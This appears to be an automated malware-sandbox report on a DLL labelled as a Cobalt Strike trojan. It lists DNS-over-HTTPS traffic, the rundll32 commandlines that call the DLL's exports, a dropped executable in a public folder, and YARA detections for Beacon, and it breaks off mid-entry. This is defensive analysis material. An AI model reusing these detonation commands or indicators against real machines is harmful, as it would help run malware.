                                                                                                                            2024-03-12 15:35:38 UTC48OUTData Raw: ca fe 01 00 00 01 00 00 00 00 00 01 00 00 02 00 01 00 00 29 10 00 00 00 00 00 00 14 00 0c 00 10 e4 40 ba fd d1 8e f7 7b 4b f6 d2 74 08 15 e4 f5
                                                                                                                            Data Ascii: )@{Kt
                                                                                                                            2024-03-12 15:35:38 UTC248INHTTP/1.1 200 OK
                                                                                                                            Date: Tue, 12 Mar 2024 15:35:38 GMT
                                                                                                                            Server: Apache/2.4.52 (Ubuntu)
                                                                                                                            Strict-Transport-Security: max-age=63072000
                                                                                                                            Cache-Control: max-age=3600.000000
                                                                                                                            Content-Length: 431
                                                                                                                            Content-Type: application/dns-message
                                                                                                                            Connection: close
                                                                                                                            2024-03-12 15:35:38 UTC431INData Raw: ca fe 81 80 00 01 00 0d 00 00 00 01 00 00 02 00 01 00 00 02 00 01 00 00 59 f0 00 14 01 69 0c 72 6f 6f 74 2d 73 65 72 76 65 72 73 03 6e 65 74 00 00 00 02 00 01 00 00 59 f0 00 14 01 6a 0c 72 6f 6f 74 2d 73 65 72 76 65 72 73 03 6e 65 74 00 00 00 02 00 01 00 00 59 f0 00 14 01 6b 0c 72 6f 6f 74 2d 73 65 72 76 65 72 73 03 6e 65 74 00 00 00 02 00 01 00 00 59 f0 00 14 01 6c 0c 72 6f 6f 74 2d 73 65 72 76 65 72 73 03 6e 65 74 00 00 00 02 00 01 00 00 59 f0 00 14 01 6d 0c 72 6f 6f 74 2d 73 65 72 76 65 72 73 03 6e 65 74 00 00 00 02 00 01 00 00 59 f0 00 14 01 61 0c 72 6f 6f 74 2d 73 65 72 76 65 72 73 03 6e 65 74 00 00 00 02 00 01 00 00 59 f0 00 14 01 62 0c 72 6f 6f 74 2d 73 65 72 76 65 72 73 03 6e 65 74 00 00 00 02 00 01 00 00 59 f0 00 14 01 63 0c 72 6f 6f 74 2d 73 65
                                                                                                                            Data Ascii: Yiroot-serversnetYjroot-serversnetYkroot-serversnetYlroot-serversnetYmroot-serversnetYaroot-serversnetYbroot-serversnetYcroot-se


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            73192.168.2.54981994.130.135.2034437572C:\Program Files (x86)\Anycast\dnscrypt\dnscrypt-proxy.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-03-12 15:35:39 UTC276OUTPOST /dns-query?body_hash=56958920ed11e4a960c5bc2a0bdc6ca6367080046d3402e676e9e71c36216897 HTTP/1.1
                                                                                                                            Host: dns.digitalsize.net
                                                                                                                            User-Agent: dnscrypt-proxy
                                                                                                                            Content-Length: 79
                                                                                                                            Accept: application/dns-message
                                                                                                                            Cache-Control: max-stale
                                                                                                                            Content-Type: application/dns-message
                                                                                                                            2024-03-12 15:35:39 UTC79OUTData Raw: ca fe 01 00 00 01 00 00 00 00 00 01 10 61 7a 61 71 6e 76 6b 79 75 6d 6c 61 67 73 76 63 04 74 65 73 74 08 64 6e 73 63 72 79 70 74 00 00 02 00 01 00 00 29 10 00 00 00 00 00 00 14 00 0c 00 10 f8 e9 31 84 ad 70 2a 40 57 21 95 28 45 ab db a3
                                                                                                                            Data Ascii: azaqnvkyumlagsvctestdnscrypt)1p*@W!(E
                                                                                                                            2024-03-12 15:35:39 UTC247INHTTP/1.1 200 OK
                                                                                                                            Date: Tue, 12 Mar 2024 15:35:39 GMT
                                                                                                                            Server: Apache/2.4.52 (Ubuntu)
                                                                                                                            Strict-Transport-Security: max-age=63072000
                                                                                                                            Cache-Control: max-age=278.000000
                                                                                                                            Content-Length: 134
                                                                                                                            Content-Type: application/dns-message
                                                                                                                            Connection: close
                                                                                                                            2024-03-12 15:35:39 UTC134INData Raw: ca fe 81 83 00 01 00 00 00 01 00 01 10 61 7a 61 71 6e 76 6b 79 75 6d 6c 61 67 73 76 63 04 74 65 73 74 08 64 6e 73 63 72 79 70 74 00 00 02 00 01 00 00 06 00 01 00 00 01 16 00 40 01 61 0c 72 6f 6f 74 2d 73 65 72 76 65 72 73 03 6e 65 74 00 05 6e 73 74 6c 64 0c 76 65 72 69 73 69 67 6e 2d 67 72 73 03 63 6f 6d 00 78 a4 43 e0 00 00 07 08 00 00 03 84 00 09 3a 80 00 01 51 80 00 00 29 10 00 00 00 00 00 00 00
                                                                                                                            Data Ascii: azaqnvkyumlagsvctestdnscrypt@aroot-serversnetnstldverisign-grscomxC:Q)


                                                                                                                            Statistics

                                                                                                                            CPU Usage

                                                                                                                            Click to jump to process

                                                                                                                            Memory Usage

                                                                                                                            Click to jump to process

                                                                                                                            High Level Behavior Distribution

                                                                                                                            Click to dive into process behavior distribution

                                                                                                                            Behavior

                                                                                                                            Click to jump to process

                                                                                                                            System Behavior

                                                                                                                            General

                                                                                                                            Target ID:0
                                                                                                                            Start time:16:31:59
                                                                                                                            Start date:12/03/2024
                                                                                                                            Path:C:\Windows\System32\loaddll64.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:loaddll64.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan.CobaltStrike.4EYNH5.5772.17622.dll"
                                                                                                                            Imagebase:0x7ff6a8360000
                                                                                                                            File size:165'888 bytes
                                                                                                                            MD5 hash:763455F9DCB24DFEECC2B9D9F8D46D52
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:moderate
                                                                                                                            Has exited:false

                                                                                                                            General

                                                                                                                            Target ID:1
                                                                                                                            Start time:16:31:59
                                                                                                                            Start date:12/03/2024
                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                            Imagebase:0x7ff6d64d0000
                                                                                                                            File size:862'208 bytes
                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:high
                                                                                                                            Has exited:false

                                                                                                                            General

                                                                                                                            Target ID:2
                                                                                                                            Start time:16:31:59
                                                                                                                            Start date:12/03/2024
                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan.CobaltStrike.4EYNH5.5772.17622.dll",#1
                                                                                                                            Imagebase:0x7ff772ec0000
                                                                                                                            File size:289'792 bytes
                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:high
                                                                                                                            Has exited:false

                                                                                                                            General

                                                                                                                            Target ID:3
                                                                                                                            Start time:16:31:59
                                                                                                                            Start date:12/03/2024
                                                                                                                            Path:C:\Windows\System32\rundll32.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan.CobaltStrike.4EYNH5.5772.17622.dll,cef_api_hash
                                                                                                                            Imagebase:0x7ff745de0000
                                                                                                                            File size:71'680 bytes
                                                                                                                            MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Yara matches:
                                                                                                                            • Rule: Windows_Trojan_CobaltStrike_663fc95d, Description: Identifies CobaltStrike via unidentified function code, Source: 00000003.00000002.4450751071.000001FF19CF0000.00000020.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000003.00000002.4448461751.000001FF17E24000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_4, Description: Yara detected CobaltStrike, Source: 00000003.00000002.4448461751.000001FF17E24000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000003.00000002.4448461751.000001FF17E24000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Windows_Trojan_CobaltStrike_ee756db7, Description: Attempts to detect Cobalt Strike based on strings found in BEACON, Source: 00000003.00000002.4448461751.000001FF17E24000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                            • Rule: Windows_Trojan_CobaltStrike_663fc95d, Description: Identifies CobaltStrike via unidentified function code, Source: 00000003.00000002.4448461751.000001FF17E24000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                            Reputation:high
                                                                                                                            Has exited:false

                                                                                                                            General

                                                                                                                            Target ID:4
                                                                                                                            Start time:16:31:59
                                                                                                                            Start date:12/03/2024
                                                                                                                            Path:C:\Windows\System32\rundll32.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan.CobaltStrike.4EYNH5.5772.17622.dll",#1
                                                                                                                            Imagebase:0x7ff745de0000
                                                                                                                            File size:71'680 bytes
                                                                                                                            MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Yara matches:
                                                                                                                            • Rule: Windows_Trojan_CobaltStrike_663fc95d, Description: Identifies CobaltStrike via unidentified function code, Source: 00000004.00000002.4451308422.000002044E250000.00000020.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000004.00000002.4448708010.000002044C399000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_4, Description: Yara detected CobaltStrike, Source: 00000004.00000002.4448708010.000002044C399000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000004.00000002.4448708010.000002044C399000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Windows_Trojan_CobaltStrike_ee756db7, Description: Attempts to detect Cobalt Strike based on strings found in BEACON, Source: 00000004.00000002.4448708010.000002044C399000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                            • Rule: Windows_Trojan_CobaltStrike_663fc95d, Description: Identifies CobaltStrike via unidentified function code, Source: 00000004.00000002.4448708010.000002044C399000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000004.00000002.4451432198.000002044E27B000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Windows_Trojan_CobaltStrike_ee756db7, Description: Attempts to detect Cobalt Strike based on strings found in BEACON, Source: 00000004.00000002.4451432198.000002044E27B000.00000004.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                            Reputation:high
                                                                                                                            Has exited:false

                                                                                                                            General

                                                                                                                            Target ID:6
                                                                                                                            Start time:16:32:02
                                                                                                                            Start date:12/03/2024
                                                                                                                            Path:C:\Users\Public\111.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:C:\Users\Public\111.exe
                                                                                                                            Imagebase:0x400000
                                                                                                                            File size:11'223'944 bytes
                                                                                                                            MD5 hash:25D325AFB078B572B0FBCA2B84AA264C
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Antivirus matches:
                                                                                                                            • Detection: 0%, ReversingLabs
                                                                                                                            Reputation:low
                                                                                                                            Has exited:true

                                                                                                                            General

                                                                                                                            Target ID:7
                                                                                                                            Start time:16:32:02
                                                                                                                            Start date:12/03/2024
                                                                                                                            Path:C:\Windows\System32\rundll32.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan.CobaltStrike.4EYNH5.5772.17622.dll,cef_execute_process
                                                                                                                            Imagebase:0x7ff745de0000
                                                                                                                            File size:71'680 bytes
                                                                                                                            MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:high
                                                                                                                            Has exited:true

                                                                                                                            General

                                                                                                                            Target ID:8
                                                                                                                            Start time:16:32:05
                                                                                                                            Start date:12/03/2024
                                                                                                                            Path:C:\Windows\System32\rundll32.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan.CobaltStrike.4EYNH5.5772.17622.dll,cef_get_path
                                                                                                                            Imagebase:0x7ff6d64d0000
                                                                                                                            File size:71'680 bytes
                                                                                                                            MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:high
                                                                                                                            Has exited:true

                                                                                                                            General

                                                                                                                            Target ID:9
                                                                                                                            Start time:16:32:08
                                                                                                                            Start date:12/03/2024
                                                                                                                            Path:C:\Windows\System32\rundll32.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan.CobaltStrike.4EYNH5.5772.17622.dll",cef_api_hash
                                                                                                                            Imagebase:0x7ff745de0000
                                                                                                                            File size:71'680 bytes
                                                                                                                            MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Yara matches:
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000009.00000002.4450635070.000001B79C0CB000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Windows_Trojan_CobaltStrike_ee756db7, Description: Attempts to detect Cobalt Strike based on strings found in BEACON, Source: 00000009.00000002.4450635070.000001B79C0CB000.00000004.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                            • Rule: Windows_Trojan_CobaltStrike_663fc95d, Description: Identifies CobaltStrike via unidentified function code, Source: 00000009.00000002.4450512387.000001B79C0A0000.00000020.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000009.00000002.4448642407.000001B79A210000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_4, Description: Yara detected CobaltStrike, Source: 00000009.00000002.4448642407.000001B79A210000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000009.00000002.4448642407.000001B79A210000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Windows_Trojan_CobaltStrike_ee756db7, Description: Attempts to detect Cobalt Strike based on strings found in BEACON, Source: 00000009.00000002.4448642407.000001B79A210000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                            • Rule: Windows_Trojan_CobaltStrike_663fc95d, Description: Identifies CobaltStrike via unidentified function code, Source: 00000009.00000002.4448642407.000001B79A210000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                            Reputation:high
                                                                                                                            Has exited:false

                                                                                                                            General

                                                                                                                            Target ID:10
                                                                                                                            Start time:16:32:08
                                                                                                                            Start date:12/03/2024
                                                                                                                            Path:C:\Windows\System32\rundll32.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan.CobaltStrike.4EYNH5.5772.17622.dll",cef_execute_process
                                                                                                                            Imagebase:0x7ff745de0000
                                                                                                                            File size:71'680 bytes
                                                                                                                            MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:high
                                                                                                                            Has exited:true

                                                                                                                            General

                                                                                                                            Target ID:11
                                                                                                                            Start time:16:32:08
                                                                                                                            Start date:12/03/2024
                                                                                                                            Path:C:\Windows\System32\rundll32.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan.CobaltStrike.4EYNH5.5772.17622.dll",cef_get_path
                                                                                                                            Imagebase:0x7ff745de0000
                                                                                                                            File size:71'680 bytes
                                                                                                                            MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:high
                                                                                                                            Has exited:true

                                                                                                                            General

                                                                                                                            Target ID:12
                                                                                                                            Start time:16:32:08
                                                                                                                            Start date:12/03/2024
                                                                                                                            Path:C:\Windows\System32\rundll32.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan.CobaltStrike.4EYNH5.5772.17622.dll",cef_v8value_create_string
                                                                                                                            Imagebase:0x7ff745de0000
                                                                                                                            File size:71'680 bytes
                                                                                                                            MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:high
                                                                                                                            Has exited:true

                                                                                                                            General

                                                                                                                            Target ID:13
                                                                                                                            Start time:16:32:08
                                                                                                                            Start date:12/03/2024
                                                                                                                            Path:C:\Windows\System32\rundll32.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan.CobaltStrike.4EYNH5.5772.17622.dll",cef_v8value_create_int
                                                                                                                            Imagebase:0x7ff745de0000
                                                                                                                            File size:71'680 bytes
                                                                                                                            MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:high
                                                                                                                            Has exited:true

                                                                                                                            General

                                                                                                                            Target ID:14
                                                                                                                            Start time:16:32:08
                                                                                                                            Start date:12/03/2024
                                                                                                                            Path:C:\Windows\System32\rundll32.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan.CobaltStrike.4EYNH5.5772.17622.dll",cef_v8value_create_function
                                                                                                                            Imagebase:0x7ff745de0000
                                                                                                                            File size:71'680 bytes
                                                                                                                            MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Has exited:true

                                                                                                                            General

                                                                                                                            Target ID:15
                                                                                                                            Start time:16:32:08
                                                                                                                            Start date:12/03/2024
                                                                                                                            Path:C:\Windows\System32\rundll32.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan.CobaltStrike.4EYNH5.5772.17622.dll",cef_v8value_create_bool
                                                                                                                            Imagebase:0x7ff745de0000
                                                                                                                            File size:71'680 bytes
                                                                                                                            MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Has exited:true

                                                                                                                            General

                                                                                                                            Target ID:16
                                                                                                                            Start time:16:32:08
                                                                                                                            Start date:12/03/2024
                                                                                                                            Path:C:\Windows\System32\rundll32.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan.CobaltStrike.4EYNH5.5772.17622.dll",cef_v8context_get_current_context
                                                                                                                            Imagebase:0x7ff745de0000
                                                                                                                            File size:71'680 bytes
                                                                                                                            MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Has exited:true

                                                                                                                            General

                                                                                                                            Target ID:17
                                                                                                                            Start time:16:32:08
                                                                                                                            Start date:12/03/2024
                                                                                                                            Path:C:\Windows\System32\rundll32.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan.CobaltStrike.4EYNH5.5772.17622.dll",cef_string_utf8_to_utf16
                                                                                                                            Imagebase:0x7ff745de0000
                                                                                                                            File size:71'680 bytes
                                                                                                                            MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Has exited:true

                                                                                                                            General

                                                                                                                            Target ID:18
                                                                                                                            Start time:16:32:08
                                                                                                                            Start date:12/03/2024
                                                                                                                            Path:C:\Windows\System32\rundll32.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan.CobaltStrike.4EYNH5.5772.17622.dll",cef_string_utf8_clear
                                                                                                                            Imagebase:0x7ff745de0000
                                                                                                                            File size:71'680 bytes
                                                                                                                            MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Has exited:true

                                                                                                                            General

                                                                                                                            Target ID:19
                                                                                                                            Start time:16:32:08
                                                                                                                            Start date:12/03/2024
                                                                                                                            Path:C:\Windows\System32\rundll32.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan.CobaltStrike.4EYNH5.5772.17622.dll",cef_string_utf16_to_utf8
                                                                                                                            Imagebase:0x7ff745de0000
                                                                                                                            File size:71'680 bytes
                                                                                                                            MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Has exited:true

                                                                                                                            General

                                                                                                                            Target ID:20
                                                                                                                            Start time:16:32:08
                                                                                                                            Start date:12/03/2024
                                                                                                                            Path:C:\Windows\System32\rundll32.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan.CobaltStrike.4EYNH5.5772.17622.dll",cef_string_utf16_set
                                                                                                                            Imagebase:0x7ff745de0000
                                                                                                                            File size:71'680 bytes
                                                                                                                            MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Has exited:true

                                                                                                                            General

                                                                                                                            Target ID:21
                                                                                                                            Start time:16:32:08
                                                                                                                            Start date:12/03/2024
                                                                                                                            Path:C:\Windows\System32\rundll32.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan.CobaltStrike.4EYNH5.5772.17622.dll",cef_string_utf16_cmp
                                                                                                                            Imagebase:0x7ff745de0000
                                                                                                                            File size:71'680 bytes
                                                                                                                            MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Has exited:true

                                                                                                                            General

                                                                                                                            Target ID:22
                                                                                                                            Start time:16:32:08
                                                                                                                            Start date:12/03/2024
                                                                                                                            Path:C:\Windows\System32\rundll32.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan.CobaltStrike.4EYNH5.5772.17622.dll",cef_string_utf16_clear
                                                                                                                            Imagebase:0x7ff745de0000
                                                                                                                            File size:71'680 bytes
                                                                                                                            MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Has exited:true

                                                                                                                            General

                                                                                                                            Target ID:23
                                                                                                                            Start time:16:32:08
                                                                                                                            Start date:12/03/2024
                                                                                                                            Path:C:\Windows\System32\rundll32.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan.CobaltStrike.4EYNH5.5772.17622.dll",cef_string_userfree_utf16_free
                                                                                                                            Imagebase:0x7ff745de0000
                                                                                                                            File size:71'680 bytes
                                                                                                                            MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Has exited:true

                                                                                                                            General

                                                                                                                            Target ID:24
                                                                                                                            Start time:16:32:08
                                                                                                                            Start date:12/03/2024
                                                                                                                            Path:C:\Windows\System32\rundll32.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan.CobaltStrike.4EYNH5.5772.17622.dll",cef_string_multimap_value
                                                                                                                            Imagebase:0x7ff745de0000
                                                                                                                            File size:71'680 bytes
                                                                                                                            MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Has exited:true

                                                                                                                            General

                                                                                                                            Target ID:25
                                                                                                                            Start time:16:32:08
                                                                                                                            Start date:12/03/2024
                                                                                                                            Path:C:\Windows\System32\rundll32.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan.CobaltStrike.4EYNH5.5772.17622.dll",cef_string_multimap_size
                                                                                                                            Imagebase:0x7ff745de0000
                                                                                                                            File size:71'680 bytes
                                                                                                                            MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Has exited:true

                                                                                                                            General

                                                                                                                            Target ID:26
                                                                                                                            Start time:16:32:08
                                                                                                                            Start date:12/03/2024
                                                                                                                            Path:C:\Windows\System32\rundll32.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan.CobaltStrike.4EYNH5.5772.17622.dll",cef_string_multimap_key
                                                                                                                            Imagebase:0x7ff745de0000
                                                                                                                            File size:71'680 bytes
                                                                                                                            MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Has exited:true

                                                                                                                            General

                                                                                                                            Target ID:27
                                                                                                                            Start time:16:32:09
                                                                                                                            Start date:12/03/2024
                                                                                                                            Path:C:\Windows\System32\rundll32.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan.CobaltStrike.4EYNH5.5772.17622.dll",cef_string_multimap_free
                                                                                                                            Imagebase:0x7ff745de0000
                                                                                                                            File size:71'680 bytes
                                                                                                                            MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Has exited:true

                                                                                                                            General

                                                                                                                            Target ID:28
                                                                                                                            Start time:16:32:09
                                                                                                                            Start date:12/03/2024
                                                                                                                            Path:C:\Users\Public\111.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:C:\Users\Public\111.exe
                                                                                                                            Imagebase:0x400000
                                                                                                                            File size:11'223'944 bytes
                                                                                                                            MD5 hash:25D325AFB078B572B0FBCA2B84AA264C
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Has exited:true

                                                                                                                            General

                                                                                                                            Target ID:29
                                                                                                                            Start time:16:32:09
                                                                                                                            Start date:12/03/2024
                                                                                                                            Path:C:\Windows\System32\rundll32.exe
                                                                                                                            Wow64 process (32bit):false
